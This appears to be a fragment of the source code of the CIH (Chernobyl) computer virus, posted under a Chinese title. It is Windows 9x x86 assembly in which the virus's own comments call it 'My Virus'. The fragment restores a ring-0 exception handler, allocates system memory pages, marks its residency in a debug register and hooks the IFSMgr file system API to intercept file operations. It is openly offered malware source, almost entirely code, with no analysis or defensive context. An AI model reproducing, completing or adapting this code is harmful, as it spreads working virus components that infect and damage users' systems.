CIH源代码

　　ExitRing0Init:
mov [ebx-04h], bp ;
shr ebp, 16 ; Restore Exception
mov [ebx+02h], bp ;

　　iretd

　　; *************************************
; * Allocate SystemMemory Page to Use *
; *************************************

　　AllocateSystemMemoryPage:

　　mov dr0, ebx ; Set the Mark of My Virus Exis
in System

　　push 00000000fh ;
push ecx ;
push 0ffffffffh ;
push ecx ;
push ecx ;
push ecx ;
push 000000001h ;
push 000000002h ;
int 20h ; VMMCALL _PageAllocate
_PageAllocate = $ ;
dd 00010053h ; Use EAX, ECX, EDX, and flags
add esp, 08h*04h

　　xchg edi, eax ; EDI = SystemMemory Start Addr
s

　　lea eax, MyVirusStart-@2[esi]

　　iretd ; Return to Ring3 Initial Program

　　; *************************************
; * Install My File System Api Hook *
; *************************************

　　InstallMyFileSystemApiHook:

　　lea eax, FileSystemApiHook-@6[edi]

　　push eax ;
int 20h ; VXDCALL IFSMgr_InstallFileSystemApiHook
IFSMgr_InstallFileSystemApiHook = $ ;
dd 00400067h ; Use EAX, ECX, EDX, and flags

　　mov dr0, eax ; Save OldFileSystemApiHook Add
ss

　　pop eax ; EAX = FileSystemApiHook Address

　　; Save Old IFSMgr_InstallFileSystemApiHook Entry Point
mov ecx, IFSMgr_InstallFileSystemApiHook-@2[esi]
mov edx, [ecx]
mov OldInstallFileSystemApiHook-@3[eax], edx